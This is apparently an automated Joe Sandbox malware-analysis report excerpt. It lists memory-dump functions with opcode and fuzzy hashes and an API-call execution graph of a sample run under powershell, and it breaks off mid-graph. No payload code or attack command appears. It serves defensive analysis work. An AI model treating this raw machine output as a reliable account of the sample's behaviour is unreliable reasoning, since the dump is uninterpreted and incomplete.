                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1c8fa7593010f62b35e1ff1c1e16c3df1ac461fd4abd2d5fe44ef9d974b13a23
                                                                                                                                                                                                                                              • Instruction ID: 0eda5a5fc032a7f203c831a619fa2818e0fc630b45b3a86b757fc2fed51b6698
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c8fa7593010f62b35e1ff1c1e16c3df1ac461fd4abd2d5fe44ef9d974b13a23
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A218B32B0CA490FEB99DBAC94553B477D0EB55325F1441FBC04DC32A7CE68A8068751
                                                                                                                                                                                                                                              Function 00007FFD9A4EA1D3 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1c95d813f98e6aebf8da592bf7939c7542329410c8a5f99a96e8f701310b83db
                                                                                                                                                                                                                                              • Instruction ID: abac36ba8a377c06f0558d840b5c3394d6125b1a6e1ae9b525bddddcdfef540c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c95d813f98e6aebf8da592bf7939c7542329410c8a5f99a96e8f701310b83db
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2014433A0D5894FE701BFACACB64E97B90EF91319B1801B7D09DC70A2DE1969048382
                                                                                                                                                                                                                                              Function 00007FFD9A4E33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction ID: f7bd2d1d2dacaefbbddbeb645a8dcb0e3750071bb665b73589ac630832aa265a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1001A73120CB0C4FD758EF0CE451AA5B3E0FB85324F10056DE58AC36A5DB36E882CB46
                                                                                                                                                                                                                                              Function 00007FFD9A5B432D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1929778258.00007FFD9A5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5B0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a5b0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 603ee98ef949dc6b4199bc1dcfb392f4323efef4face4d16625b4ae652fd9795
                                                                                                                                                                                                                                              • Instruction ID: 1ea930747b04b282ef89cd8a57ac70b22a2fdc70aa76fb00a3aace7666c02118
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 603ee98ef949dc6b4199bc1dcfb392f4323efef4face4d16625b4ae652fd9795
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F09A32B0D5058FD7B9EA4CA8948A873F0EF4A32171500FBE159C71A7CA26EC80C742
                                                                                                                                                                                                                                              Function 00007FFD9A5B45E0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1929778258.00007FFD9A5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5B0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a5b0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9274ccc6ac2e189046b7dbbf2b5720d8562167da5c679a720495ab583625eaf6
                                                                                                                                                                                                                                              • Instruction ID: 0cc6c9e10a83476e0b1dd19e83c18a65e10e7981dbdd3499efc57e456004a491
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9274ccc6ac2e189046b7dbbf2b5720d8562167da5c679a720495ab583625eaf6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F05E32B0D5448FDBA9EE5CE4958A877F0EF0632571510F7E159C75A7CA26AC40C741

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FFD9A4E84FA Relevance: 9.0, Strings: 7, Instructions: 229COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: L_^$L_^$L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                              • API String ID: 0-358832956
                                                                                                                                                                                                                                              • Opcode ID: d21154742f999148821eb2bfc24e736ac9d72b24ea6ddc28efa38152a48e4c71
                                                                                                                                                                                                                                              • Instruction ID: 23d2bf42f17fa08abe4851f96e8f09baa89d5ae1d6c1ec4400146a00ff251b70
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d21154742f999148821eb2bfc24e736ac9d72b24ea6ddc28efa38152a48e4c71
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0710297F0EAC30AE76A4ABD68751A57BD0EF52354B2D01F6C0DC8A0A3ED196C068753

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFD9A5A1821 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1994470884.00007FFD9A5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a5a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 457abc6f10abe163c2b6dce073789d151ba4809e254ec9ce9c02712f3c3f30d9
                                                                                                                                                                                                                                              • Instruction ID: 8d88ca9b9556be41970e09a6328202088f12b23bbce516eb047c987e78de76e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 457abc6f10abe163c2b6dce073789d151ba4809e254ec9ce9c02712f3c3f30d9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05A11862B0DB854FE7AB9A6848651B57BE1EF87320B1941FFD04DC71E3DE18A806C351
                                                                                                                                                                                                                                              Function 00007FFD9A5A1AB1 Relevance: .3, Instructions: 267COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1994470884.00007FFD9A5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a5a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cd21fb031576acbe2ad2db43e9f06e5de0d77f18280fc4e08f2a8ed9c1ae9fd8
                                                                                                                                                                                                                                              • Instruction ID: a8949a15d5e0640d402c1d4167de538688b21b2e6a10b78103937854a0db3c4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd21fb031576acbe2ad2db43e9f06e5de0d77f18280fc4e08f2a8ed9c1ae9fd8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC711423F0EA994FE7BA9AA858655B57BD1FF86310B1801FAD05DC31D7ED18AC05C342
                                                                                                                                                                                                                                              Function 00007FFD9A4D4EE6 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1993662840.00007FFD9A4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a4d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7204be0f352d38a7c8cf03cf29e20d36eb8a7981a3677f71610394fe21190b2c
                                                                                                                                                                                                                                              • Instruction ID: 17e939447984b0e04a89c714b1c475f11e8dfa07fbb1d7b27b30a35d1e3b97df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7204be0f352d38a7c8cf03cf29e20d36eb8a7981a3677f71610394fe21190b2c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3413D71E18A088FDB58EFACD8915ACB7F1EF59315B1441ADD40EE7292CF35A842CB81
                                                                                                                                                                                                                                              Function 00007FFD9A4D4E51 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1993662840.00007FFD9A4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a4d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 012b2405407794b4d79654df0742d776903c17c8c31c1b569b9b95dbaf4e4f07
                                                                                                                                                                                                                                              • Instruction ID: ab8f2c3a96d53b3f7e44af16d713040c67af03ad229a4c6a2da26d1a14756fe0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 012b2405407794b4d79654df0742d776903c17c8c31c1b569b9b95dbaf4e4f07
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2112E71E186198FEB58EF58D4552ACB7A1EF58315F24416DD00EE7285CF35A842CB44
                                                                                                                                                                                                                                              Function 00007FFD9A4D3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1993662840.00007FFD9A4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a4d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                              • Instruction ID: 7bf64428fcf30c46270b6fc06329f52be7a7907989bdb226c8e40e3ffa0b6f0f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D101A73120CB0C4FD758EF0CE451AA5B7E0FB85324F10056DE58AC36A5D736E882CB46

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:8%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                                                                                                              Total number of Nodes:1241
                                                                                                                                                                                                                                              Total number of Limit Nodes:41
                                                                                                                                                                                                                                              execution_graph 38221 7ff64feb2450 38228 7ff64feb3734 38221->38228 38223 7ff64feb2455 38224 7ff64feb6998 abort LeaveCriticalSection 38223->38224 38225 7ff64feb2460 38224->38225 38226 7ff64feb246c 38225->38226 38227 7ff64feb2488 11 API calls 38225->38227 38227->38226 38233 7ff64feb5630 GetLastError 38228->38233 38230 7ff64feb373f 38253 7ff64feb4a1c 35 API calls abort 38230->38253 38234 7ff64feb564d 38233->38234 38235 7ff64feb5652 38233->38235 38254 7ff64feb6cf4 6 API calls __vcrt_uninitialize_ptd 38234->38254 38239 7ff64feb569b 38235->38239 38255 7ff64feb4b14 15 API calls 3 library calls 38235->38255 38238 7ff64feb5669 38240 7ff64feb5671 38238->38240 38262 7ff64feb6d4c 6 API calls __vcrt_uninitialize_ptd 38238->38262 38241 7ff64feb56a0 SetLastError 38239->38241 38242 7ff64feb56b6 SetLastError 38239->38242 38256 7ff64feb4a74 38240->38256 38241->38230 38264 7ff64feb4a1c 35 API calls abort 38242->38264 38244 7ff64feb5688 38244->38240 38247 7ff64feb568f 38244->38247 38263 7ff64feb53e0 15 API calls FindHandlerForForeignException 38247->38263 38249 7ff64feb5678 38249->38242 38251 7ff64feb5694 38252 7ff64feb4a74 __free_lconv_num 15 API calls 38251->38252 38252->38239 38254->38235 38255->38238 38257 7ff64feb4a79 RtlFreeHeap 38256->38257 38261 7ff64feb4aa9 __free_lconv_num 38256->38261 38258 7ff64feb4a94 38257->38258 38257->38261 38265 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 38258->38265 38260 7ff64feb4a99 GetLastError 38260->38261 38261->38249 38262->38244 38263->38251 38265->38260 38266 7ff64fe57a5b 38267 7ff64fe57a60 38266->38267 38270 7ff64fe57af7 38267->38270 38299 7ff64fe69be0 38267->38299 38269 7ff64fe57bda 38310 7ff64fe5b540 38269->38310 38270->38269 38402 7ff64fe71e1c GetFileTime 38270->38402 38275 7ff64fe5b540 147 API calls 38278 7ff64fe57c9c 38275->38278 38276 7ff64fe57c3e 38276->38275 38277 7ff64fe57f89 38278->38277 38404 7ff64fe76378 38278->38404 38280 7ff64fe57cd7 38281 7ff64fe76378 4 API calls 38280->38281 38283 7ff64fe57cf3 38281->38283 38282 7ff64fe57de1 38289 7ff64fe57e4e 38282->38289 38415 7ff64fe898dc 38282->38415 38283->38282 38284 7ff64fe57d38 38283->38284 38285 7ff64fe57d59 38283->38285 38408 7ff64feaa444 38284->38408 38288 7ff64feaa444 new 4 API calls 38285->38288 38293 7ff64fe57d42 std::bad_alloc::bad_alloc 38288->38293 38421 7ff64fe51204 48 API calls 38289->38421 38291 7ff64fe57eb3 38294 7ff64fe57edb 38291->38294 38422 7ff64fe89680 38291->38422 38293->38282 38414 7ff64feaba34 RtlPcToFileHeader RaiseException 38293->38414 38428 7ff64fe76424 8 API calls _handle_error 38294->38428 38296 7ff64fe57f56 38298 7ff64fe5b540 147 API calls 38296->38298 38298->38277 38429 7ff64fe6901c CryptAcquireContextW 38299->38429 38303 7ff64fe69c2a 38439 7ff64fe99ce4 38303->38439 38307 7ff64fe69c5b memcpy_s 38449 7ff64feaa610 38307->38449 38314 7ff64fe5b55f pre_c_initialization 38310->38314 38311 7ff64fe5b5a1 38312 7ff64fe5b5d8 38311->38312 38313 7ff64fe5b5b8 38311->38313 38588 7ff64fe88c1c 38312->38588 38474 7ff64fe5aba0 38313->38474 38314->38311 38470 7ff64fe5a4d0 38314->38470 38317 7ff64feaa610 _handle_error 8 API calls 38319 7ff64fe57bf8 38317->38319 38318 7ff64fe5b67f 38320 7ff64fe5bc91 38318->38320 38321 7ff64fe5b6a5 38318->38321 38322 7ff64fe5bbae 38318->38322 38319->38276 38403 7ff64fea9b98 216 API calls 3 library calls 38319->38403 38325 7ff64fe72574 126 API calls 38320->38325 38328 7ff64fe5b5d3 38320->38328 38321->38328 38333 7ff64fe5b6b5 38321->38333 38352 7ff64fe5b79f 38321->38352 38323 7ff64fe88d00 48 API calls 38322->38323 38326 7ff64fe5bc5c 38323->38326 38325->38328 38657 7ff64fe88d38 48 API calls 38326->38657 38328->38317 38331 7ff64fe5bc69 38658 7ff64fe88d38 48 API calls 38331->38658 38333->38328 38622 7ff64fe88d00 38333->38622 38335 7ff64fe5bc76 38659 7ff64fe88d38 48 API calls 38335->38659 38337 7ff64fe5bc84 38660 7ff64fe88d88 48 API calls 38337->38660 38342 7ff64fe5b726 38626 7ff64fe88d38 48 API calls 38342->38626 38344 7ff64fe5b733 38345 7ff64fe5b749 38344->38345 38627 7ff64fe88d88 48 API calls 38344->38627 38347 7ff64fe5b75c 38345->38347 38628 7ff64fe88d38 48 API calls 38345->38628 38349 7ff64fe5b779 38347->38349 38351 7ff64fe88d00 48 API calls 38347->38351 38629 7ff64fe88f94 38349->38629 38351->38347 38353 7ff64fe5b8e5 38352->38353 38639 7ff64fe5c3c8 CharLowerW CharUpperW 38352->38639 38640 7ff64fe9d840 WideCharToMultiByte 38353->38640 38357 7ff64fe5b9a1 38359 7ff64fe88d00 48 API calls 38357->38359 38360 7ff64fe5b9c4 38359->38360 38643 7ff64fe88d38 48 API calls 38360->38643 38362 7ff64fe5b910 38362->38357 38642 7ff64fe5945c 55 API calls _handle_error 38362->38642 38363 7ff64fe5b9d1 38644 7ff64fe88d38 48 API calls 38363->38644 38365 7ff64fe5b9de 38645 7ff64fe88d88 48 API calls 38365->38645 38367 7ff64fe5b9eb 38646 7ff64fe88d88 48 API calls 38367->38646 38369 7ff64fe5ba0b 38370 7ff64fe88d00 48 API calls 38369->38370 38371 7ff64fe5ba27 38370->38371 38647 7ff64fe88d88 48 API calls 38371->38647 38373 7ff64fe5ba37 38374 7ff64fe5ba49 38373->38374 38648 7ff64fe9bc48 15 API calls 38373->38648 38649 7ff64fe88d88 48 API calls 38374->38649 38377 7ff64fe5ba59 38378 7ff64fe88d00 48 API calls 38377->38378 38379 7ff64fe5ba66 38378->38379 38380 7ff64fe88d00 48 API calls 38379->38380 38381 7ff64fe5ba78 38380->38381 38650 7ff64fe88d38 48 API calls 38381->38650 38383 7ff64fe5ba85 38651 7ff64fe88d88 48 API calls 38383->38651 38385 7ff64fe5ba92 38386 7ff64fe5bacd 38385->38386 38652 7ff64fe88d88 48 API calls 38385->38652 38654 7ff64fe88e3c 38386->38654 38388 7ff64fe5bab2 38653 7ff64fe88d88 48 API calls 38388->38653 38392 7ff64fe5bb33 38393 7ff64fe5bb53 38392->38393 38396 7ff64fe88e3c 48 API calls 38392->38396 38397 7ff64fe5bb6e 38393->38397 38399 7ff64fe88e3c 48 API calls 38393->38399 38394 7ff64fe88d00 48 API calls 38398 7ff64fe5bb09 38394->38398 38395 7ff64fe88e3c 48 API calls 38395->38392 38396->38393 38400 7ff64fe88f94 126 API calls 38397->38400 38398->38392 38398->38395 38399->38397 38400->38328 38402->38269 38403->38276 38405 7ff64fe76396 38404->38405 38407 7ff64fe763a0 38404->38407 38406 7ff64feaa444 new 4 API calls 38405->38406 38406->38407 38407->38280 38409 7ff64feaa44f 38408->38409 38410 7ff64feaa47a 38409->38410 38411 7ff64feb36c0 new 2 API calls 38409->38411 38851 7ff64feab314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38409->38851 38852 7ff64feab2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38409->38852 38410->38293 38411->38409 38414->38282 38416 7ff64fe89926 38415->38416 38417 7ff64fe8993c 38415->38417 38418 7ff64fe690b8 75 API calls 38416->38418 38419 7ff64fe690b8 75 API calls 38417->38419 38420 7ff64fe89934 38418->38420 38419->38420 38420->38289 38421->38291 38426 7ff64fe896a4 38422->38426 38423 7ff64fe897d7 38424 7ff64fe72574 126 API calls 38424->38426 38426->38423 38426->38424 38427 7ff64fea9b98 216 API calls 38426->38427 38853 7ff64fe76498 72 API calls new 38426->38853 38427->38426 38428->38296 38430 7ff64fe69057 CryptGenRandom CryptReleaseContext 38429->38430 38431 7ff64fe6907e 38429->38431 38430->38431 38432 7ff64fe69089 38430->38432 38433 7ff64fe69c9c 11 API calls 38431->38433 38434 7ff64fe69c9c 38432->38434 38433->38432 38458 7ff64fe9c0a8 GetSystemTime SystemTimeToFileTime 38434->38458 38436 7ff64fe69cc5 38461 7ff64feb2d74 38436->38461 38440 7ff64fe69c49 38439->38440 38441 7ff64fe99d15 memcpy_s 38439->38441 38443 7ff64fe99b70 38440->38443 38441->38440 38464 7ff64fe99d74 38441->38464 38444 7ff64fe99bad __scrt_fastfail 38443->38444 38448 7ff64fe99bd9 __scrt_fastfail 38443->38448 38447 7ff64fe99d74 8 API calls 38444->38447 38444->38448 38445 7ff64fe99d74 8 API calls 38446 7ff64fe99c07 38445->38446 38446->38307 38447->38448 38448->38445 38450 7ff64feaa61a 38449->38450 38451 7ff64fe69c86 38450->38451 38452 7ff64feaa6a0 IsProcessorFeaturePresent 38450->38452 38451->38270 38453 7ff64feaa6b7 38452->38453 38468 7ff64feaa894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38453->38468 38455 7ff64feaa6ca 38469 7ff64feaa66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38455->38469 38459 7ff64feaa610 _handle_error 8 API calls 38458->38459 38460 7ff64fe9c0f1 38459->38460 38460->38436 38462 7ff64feb2d8b QueryPerformanceCounter 38461->38462 38463 7ff64fe69cd7 38461->38463 38462->38463 38463->38303 38465 7ff64fe99dbc 38464->38465 38466 7ff64feaa610 _handle_error 8 API calls 38465->38466 38467 7ff64fe99f40 38466->38467 38467->38441 38468->38455 38471 7ff64fe5a4ea 38470->38471 38472 7ff64fe5a4ee 38471->38472 38661 7ff64fe72440 38471->38661 38472->38311 38475 7ff64fe5abbf pre_c_initialization 38474->38475 38476 7ff64fe88c1c 48 API calls 38475->38476 38480 7ff64fe5abf5 38476->38480 38477 7ff64fe5aca7 38478 7ff64fe5b4af 38477->38478 38479 7ff64fe5acbf 38477->38479 38481 7ff64fe5b4ff 38478->38481 38485 7ff64fe72574 126 API calls 38478->38485 38482 7ff64fe5b35c 38479->38482 38483 7ff64fe5acc8 38479->38483 38480->38477 38480->38478 38484 7ff64fe69be0 14 API calls 38480->38484 38690 7ff64fe872c0 38481->38690 38487 7ff64fe88eec 48 API calls 38482->38487 38488 7ff64fe5acdd 38483->38488 38528 7ff64fe5aea7 38483->38528 38587 7ff64fe5ad60 38483->38587 38489 7ff64fe5ac34 38484->38489 38485->38481 38490 7ff64fe5b395 38487->38490 38491 7ff64fe5ace6 38488->38491 38492 7ff64fe5ad68 38488->38492 38493 7ff64fe690b8 75 API calls 38489->38493 38494 7ff64fe5b3ad 38490->38494 38689 7ff64fe59e2c 48 API calls 38490->38689 38491->38587 38671 7ff64fe88eec 38491->38671 38496 7ff64fe88eec 48 API calls 38492->38496 38495 7ff64fe5ac8f 38493->38495 38499 7ff64fe88eec 48 API calls 38494->38499 38495->38477 38506 7ff64fe72574 126 API calls 38495->38506 38502 7ff64fe5ad9c 38496->38502 38498 7ff64feaa610 _handle_error 8 API calls 38503 7ff64fe5b52b 38498->38503 38500 7ff64fe5b3d4 38499->38500 38504 7ff64fe5b3e6 38500->38504 38508 7ff64fe88eec 48 API calls 38500->38508 38507 7ff64fe88eec 48 API calls 38502->38507 38503->38328 38512 7ff64fe88eec 48 API calls 38504->38512 38506->38477 38510 7ff64fe5ada9 38507->38510 38508->38504 38509 7ff64fe88eec 48 API calls 38513 7ff64fe5ad31 38509->38513 38511 7ff64fe88eec 48 API calls 38510->38511 38514 7ff64fe5adb5 38511->38514 38515 7ff64fe5b451 38512->38515 38516 7ff64fe88eec 48 API calls 38513->38516 38517 7ff64fe88eec 48 API calls 38514->38517 38518 7ff64fe5b471 38515->38518 38524 7ff64fe88eec 48 API calls 38515->38524 38519 7ff64fe5ad46 38516->38519 38520 7ff64fe5adc2 38517->38520 38522 7ff64fe5b486 38518->38522 38525 7ff64fe88e3c 48 API calls 38518->38525 38521 7ff64fe88f94 126 API calls 38519->38521 38523 7ff64fe88d00 48 API calls 38520->38523 38521->38587 38526 7ff64fe88f94 126 API calls 38522->38526 38527 7ff64fe5adcf 38523->38527 38524->38518 38525->38522 38526->38587 38530 7ff64fe690b8 75 API calls 38527->38530 38529 7ff64fe5afda 38528->38529 38679 7ff64fe59b64 48 API calls _handle_error 38528->38679 38537 7ff64fe5aff2 38529->38537 38680 7ff64fe59d98 48 API calls 38529->38680 38533 7ff64fe5ae22 38530->38533 38534 7ff64fe88e3c 48 API calls 38533->38534 38535 7ff64fe5ae33 38534->38535 38536 7ff64fe88e3c 48 API calls 38535->38536 38540 7ff64fe5ae48 38536->38540 38538 7ff64fe5b02b 38537->38538 38681 7ff64fe59efc 48 API calls _handle_error 38537->38681 38539 7ff64fe5b0af 38538->38539 38682 7ff64fe5a2c8 48 API calls 38538->38682 38543 7ff64fe5b0c8 38539->38543 38683 7ff64fe5a1a0 48 API calls 2 library calls 38539->38683 38547 7ff64fe99ce4 8 API calls 38540->38547 38545 7ff64fe5b0e2 38543->38545 38684 7ff64fe5a350 48 API calls _handle_error 38543->38684 38548 7ff64fe88eec 48 API calls 38545->38548 38549 7ff64fe5ae60 38547->38549 38551 7ff64fe5b0fc 38548->38551 38550 7ff64fe99b70 8 API calls 38549->38550 38552 7ff64fe5ae6d 38550->38552 38553 7ff64fe88eec 48 API calls 38551->38553 38554 7ff64fe88e3c 48 API calls 38552->38554 38555 7ff64fe5b109 38553->38555 38556 7ff64fe5ae80 38554->38556 38557 7ff64fe5b11f 38555->38557 38559 7ff64fe88eec 48 API calls 38555->38559 38558 7ff64fe88f94 126 API calls 38556->38558 38675 7ff64fe88e94 38557->38675 38558->38587 38559->38557 38562 7ff64fe88eec 48 API calls 38563 7ff64fe5b147 38562->38563 38564 7ff64fe88e94 48 API calls 38563->38564 38565 7ff64fe5b15f 38564->38565 38566 7ff64fe88eec 48 API calls 38565->38566 38569 7ff64fe5b16c 38566->38569 38567 7ff64fe5b18a 38568 7ff64fe5b1a9 38567->38568 38686 7ff64fe88d88 48 API calls 38567->38686 38571 7ff64fe88e94 48 API calls 38568->38571 38569->38567 38685 7ff64fe88d88 48 API calls 38569->38685 38573 7ff64fe5b1bc 38571->38573 38574 7ff64fe88eec 48 API calls 38573->38574 38575 7ff64fe5b1d6 38574->38575 38577 7ff64fe5b1e9 38575->38577 38687 7ff64fe5c3c8 CharLowerW CharUpperW 38575->38687 38577->38577 38578 7ff64fe88eec 48 API calls 38577->38578 38579 7ff64fe5b21f 38578->38579 38580 7ff64fe88e3c 48 API calls 38579->38580 38581 7ff64fe5b230 38580->38581 38582 7ff64fe5b247 38581->38582 38583 7ff64fe88e3c 48 API calls 38581->38583 38584 7ff64fe88f94 126 API calls 38582->38584 38583->38582 38585 7ff64fe5b278 38584->38585 38585->38587 38688 7ff64fe870d8 4 API calls 2 library calls 38585->38688 38587->38498 38711 7ff64fe88f28 38588->38711 38591 7ff64fe690b8 38592 7ff64fe69123 38591->38592 38604 7ff64fe691a9 38591->38604 38592->38604 38729 7ff64fe97e74 38592->38729 38594 7ff64feaa610 _handle_error 8 API calls 38596 7ff64fe5b66e 38594->38596 38607 7ff64fe72574 38596->38607 38597 